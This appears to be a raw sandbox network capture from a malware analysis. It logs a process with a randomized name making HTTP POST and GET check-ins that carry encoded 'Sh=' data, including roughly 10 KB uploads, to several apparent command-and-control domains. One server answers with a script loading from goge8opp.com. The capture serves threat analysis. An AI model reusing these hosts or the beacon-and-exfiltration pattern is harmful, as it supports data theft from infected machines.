Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:21.770148993 CEST | 748 | OUT | POST /o1rp/ HTTP/1.1
                                                                                                        Host: www.yosoyemy.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yosoyemy.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yosoyemy.com/o1rp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=eDEx+SjW/58aj21ah1Yh/1s/AggFZqHQdln6A+KCZo7yp2vtkjL8tiPPS+SGQKppQhmzQlo/lNRQ5zNwAmtImGNcl68w+Zs7fw8B6ZrT/2I1ZLeuD0RyjAgqznmzkLDzIIQBCQpioA4WFm5MNWI+y7JB7k43Do7GiOaWBvFClnHKVbwQ81V2/OsulscqAh8TnQ==
Oct 10, 2024 14:46:22.302696943 CEST | 454 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:46:22 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 166
                                                                                                        Location: http://www.yosoyemy.com/o1rp
                                                                                                        X-Hostinger-Datacenter: gcp-usc1
                                                                                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                                                                                        Via: 1.1 google
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49754 | 34.120.137.41 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:24.326073885 CEST | 768 | OUT | POST /o1rp/ HTTP/1.1
                                                                                                        Host: www.yosoyemy.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yosoyemy.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yosoyemy.com/o1rp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=eDEx+SjW/58aiWlankYh5Vs4OAgFSKGXdl76A9HdeeTypXftqCL8siPPLOS5N6pYQhrGQlE/lNFQ5xVwBUFPnWNkoa8+w5s7fw8B6Z/p/2g1Z7uuCVRxvggp0nmzprD3IIRkCREHoEIWFnJMNnIh47J90E5bL9WZ7rzlcch+82Cmd9hKtE0htOId4rVeNiBa8STHbnlUKRAkInrjpV5bTiA=
Oct 10, 2024 14:46:24.790009975 CEST | 454 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:46:24 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 166
                                                                                                        Location: http://www.yosoyemy.com/o1rp
                                                                                                        X-Hostinger-Datacenter: gcp-usc1
                                                                                                        X-Hostinger-Node: gcp-usc1-builder-edge2
                                                                                                        Via: 1.1 google
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49765 | 34.120.137.41 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:26.874218941 CEST | 10850 | OUT | POST /o1rp/ HTTP/1.1
                                                                                                        Host: www.yosoyemy.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yosoyemy.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yosoyemy.com/o1rp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Data Ascii: Sh= [TRUNCATED]
Oct 10, 2024 14:46:27.343168020 CEST | 454 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:46:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 166
                                                                                                        Location: http://www.yosoyemy.com/o1rp
                                                                                                        X-Hostinger-Datacenter: gcp-usc1
                                                                                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                                                                                        Via: 1.1 google
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49783 | 34.120.137.41 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:29.419471979 CEST | 485 | OUT | GET /o1rp/?Sh=TBsR9lfn+qQhrzhd4VN7whgaax1SSLbEYlfYc+CfPbvAogjyvhThgxnzNfioE4F1AGXhUEA9gsdduAUKMlkxrWhulp0A29FjViMz3Iaz4UFzPouUBmhdpGY=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.yosoyemy.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:46:29.885693073 CEST | 596 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:46:29 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 166
                                                                                                        Location: http://www.yosoyemy.com/o1rp?Sh=TBsR9lfn+qQhrzhd4VN7whgaax1SSLbEYlfYc+CfPbvAogjyvhThgxnzNfioE4F1AGXhUEA9gsdduAUKMlkxrWhulp0A29FjViMz3Iaz4UFzPouUBmhdpGY=&f6SpQ=_n84nZ4HGta
                                                                                                        X-Hostinger-Datacenter: gcp-usc1
                                                                                                        X-Hostinger-Node: gcp-usc1-builder-edge3
                                                                                                        Via: 1.1 google
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49817 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:35.065460920 CEST | 748 | OUT | POST /uqfz/ HTTP/1.1
                                                                                                        Host: www.go2super.app
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.go2super.app
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.go2super.app/uqfz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=re8xfGooFKOuMGUqqi2m7kb2it0hDbEwDvUOdHxF6rb3WU7/Oogm4cH0ednm0ig+uAXsjXIw4QTCfdFh7iL+dwJgT8TZuEIZQj0nvLbU60kwZQZgHanM73eDO1fOK01bgHg/RC4lA16qk30G7bOTtPk34rau5W+J5fcze7O5FJTH17QdC19yE0PJss28Uxnenw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49833 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:37.680917978 CEST | 768 | OUT | POST /uqfz/ HTTP/1.1
                                                                                                        Host: www.go2super.app
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.go2super.app
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.go2super.app/uqfz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=re8xfGooFKOuMmkqoD2m+EbxtN0hI7E0DvoOdCIA64/3X1L/PqYm7cH0Gtnjwig1uATkjVcw4QHCfYph7TL/cgJiGsTbhkIZQj0nvPL+608wZgpgVLnT1XeAJ1fOAk1fgHgNRD0PAw2qk1sG8KOcnPl+1LbawHvD0do9AoSWa7HKw9BHTEclW0r6xr/IZyaX8xW+UDQmld8oB2m/N4eZwgs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49845 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:40.225322962 CEST | 10850 | OUT | POST /uqfz/ HTTP/1.1
                                                                                                        Host: www.go2super.app
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.go2super.app
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.go2super.app/uqfz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=re8xfGooFKOuMmkqoD2m+EbxtN0hI7E0DvoOdCIA6433WGD/PLYm6cH0PNniwigkuE/gjVAg4S/Ce6hh9nX/JwJiZcTeuEIpQjluvLX+608wZjxgWanT43eDO1f8K017gH56RDw1BD+qjV8G64WcvPlw0LbCwHjA0d1CArO8a5bKw7wkDWZ6UFihtZnIXAKQ0SmAXiEE4P4IMGnKeIqoh1kWNCYuwxtZHVwoiBGHwRHMC76gl+CpwM/33snjm9HDsOWlozo/RcXv1tkSlNsENWOXJ14NdMyHPmcmGLAmbcTipdH0UpRgjEaycoqLSs0rsSocJbjHHR97/VNUHOHfhOsA/R3oKWdA09tunx7LxoN27C+cldBjgoGE9g9yAwA0W8eyva47Fhuf7Ri4de73leZbBICZPIdh+pHR+JaFUowPkYHg4j89nXu2K/zruIZc4lz9ojNYpXp6mwip6nxlYB/1pfYSWdG/cRkkVGY8fPeZy3CvPGTfcGSTPt6nSoGyWQvKJW3i0t3aPmD2aqSboT6uG0Fd9CnT5mf/iB1VzRcG66aCYWroDbQxADVSrcbvC7pufuI2hABVRg8wD8CT/8AYpsomCwTkRrlyzTINrSKx2s+QAos/tkNH8EFiZg6GWtG2XDYxWASHaMATV3nwJYV+hgMryXKzmBU97GUUvXd/uQ8Pq1k7f/Ve/phRdy3DvWMr8Z+XEezR0lZytdRDXHquaFN/SMsI/zqX7cLh2VuQELL3rAvx59amvvCtRA0EQLlmwvNvNI8lCvDyskdYBk9ikjQvfGoiudfzArb5PVwVu4d8c3Tve0YV9pUrig7vbAB1XskYuLBf+AbTe8ZBVmkX/Ry0zEIWiAqXX0xJbh/zc13GWDxFcpadY9CYuCOBTv0kXGXwnG6/BhFyNNbqdgm/vVRCXnOod6Rn3stWiLRrEblrtOHjtBANVitxdtGMOPAp6fD1zh+iX3z51tz6OCMPo/89U9HoD57/3oSSkexC4dpNT [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49860 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:42.764571905 CEST | 485 | OUT | GET /uqfz/?Sh=mcURcygGZpi8BUAEri2LzCX8yukoHIUSB9ATV0AA66/eXSD2DbYq2fDOBcTf2y0GiA7pk1o8xA7eBrRh6Cv9Vx9YWZ7NmBQtUSw3jvSSlGdRHD15Z6r2w2o=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.go2super.app
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:46:44.155246973 CEST | 396 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:46:44 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 256
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sh=mcURcygGZpi8BUAEri2LzCX8yukoHIUSB9ATV0AA66/eXSD2DbYq2fDOBcTf2y0GiA7pk1o8xA7eBrRh6Cv9Vx9YWZ7NmBQtUSw3jvSSlGdRHD15Z6r2w2o=&f6SpQ=_n84nZ4HGta"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49901 | 81.88.48.71 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:49.258930922 CEST | 751 | OUT | POST /3nzp/ HTTP/1.1
                                                                                                        Host: www.corverd.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.corverd.store
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.corverd.store/3nzp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=CiNEpziMYXvS5w/ek/Iqyd0ZqVPntFvg5JGNgGOWhi5lq9FVE0p6kC473RcrinBLP1oKqJ+cfPDbB3E0AilDycZp2vTjKdpDbzegmiTMb1pUt8GBvay2AxQuG6J2v9+aX11/P9laSkoStdoFo3dH2henyuFabW//u7+LL9fVM/ulClLOVGosB2liX8b2XRpWXg==
Oct 10, 2024 14:46:49.954166889 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:46:49 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 203
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49922 | 81.88.48.71 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:51.800765038 CEST | 771 | OUT | POST /3nzp/ HTTP/1.1
                                                                                                        Host: www.corverd.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.corverd.store
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.corverd.store/3nzp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=CiNEpziMYXvS5QPeo4cq390avVPn4Vun5JCNgDiGh0plqZJVW2B6lC47lxdhsHBQP1l3qIycfPXbBy40VBNC9sZn9PThH9pDbzegmhv2b1xUtPeBu7ypDxQvOaJ2r9+GX10YP/B0SnAStc0FrmdA4Reb8OEXfnSzsbz/OdOuT8LJHjaUE3J7T2BRK7SCaSUfMlcRckEEnmGB5RwbArHlXfk=
Oct 10, 2024 14:46:52.465985060 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:46:52 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 203
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49938 | 81.88.48.71 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:54.347877026 CEST | 10853 | OUT | POST /3nzp/ HTTP/1.1
                                                                                                        Host: www.corverd.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.corverd.store
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.corverd.store/3nzp/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Data Ascii: Sh= [TRUNCATED]
Oct 10, 2024 14:46:55.113912106 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:46:54 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 203
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49954 | 81.88.48.71 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:46:56.889822006 CEST | 486 | OUT | GET /3nzp/?Sh=PglkqFvbbyb87SegldF7644R50nw13706su3sEKMhHJ419d8UFlSgmN6uEUbiABfJzkrsK6wePLWTRJFKAJP15xlx/rUOqsRMQGimgyXa3wd/uL7sq2sISc=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.corverd.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:46:57.568619967 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:46:57 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 203
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49993 | 162.209.189.212 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:03.468956947 CEST | 739 | OUT | POST /x35b/ HTTP/1.1
                                                                                                        Host: www.66hc7.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.66hc7.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.66hc7.com/x35b/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=SXrqKEy3eO0QW/Vjl0IPxopoexplTJ45V3dacd91Llo+bh6EE4drmZu5fyLv4g5qClN7iXjtTZyHqUbgMKdIcESrdRCrqg7DmrvbkmUboyL0IMkn2D1IIWtq6VLRK1ZC7PUcU+ZG433LgJurYyMu0wW2HfkLQ3IP4lfQHjxDfEWJXa3s4UI/YO/Kttc53f/dxg==
Oct 10, 2024 14:47:03.958451986 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 96
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50006 | 162.209.189.212 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:06.017105103 CEST | 759 | OUT | POST /x35b/ HTTP/1.1
                                                                                                        Host: www.66hc7.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.66hc7.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.66hc7.com/x35b/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=SXrqKEy3eO0QXc9jmVIPgIprRRplZp49V3RacfQuKWc+bF+EF5drlZu5HiLu2A5bClQGiWPtTdiHqWTgN9JLaUSpEBC1lA7DmrvbkmBTox70I/Mn2nhPF2tr5VLRO1ZG7PUiU7Bg41/LgIerfjMt9wWwDfkUBi160wzQCwVycmO+Scm2plpoKOb5wqVN6cCUqlzJLykeGSuqOyagK3kbXC0=
Oct 10, 2024 14:47:06.543301105 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 96
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50019 | 162.209.189.212 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:08.566616058 CEST | 10841 | OUT | POST /x35b/ HTTP/1.1
                                                                                                        Host: www.66hc7.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.66hc7.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.66hc7.com/x35b/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Data Ascii: Sh= [TRUNCATED]
Oct 10, 2024 14:47:09.117835045 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 96
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50020 | 162.209.189.212 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:11.120007038 CEST | 482 | OUT | GET /x35b/?Sh=fVDKJz+SStMVbfQUmkYKwfd/Kz5vW54YQ3dZU+tucUYAFBvCN7d4q6mFay3q8TR2KAYtpV66b4jE73PrL/8YW0e6Mz+digafyc3ZonBVmSzoReAw1BtBLHs=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.66hc7.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:47:11.618407011 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                        Content-Type: text/html
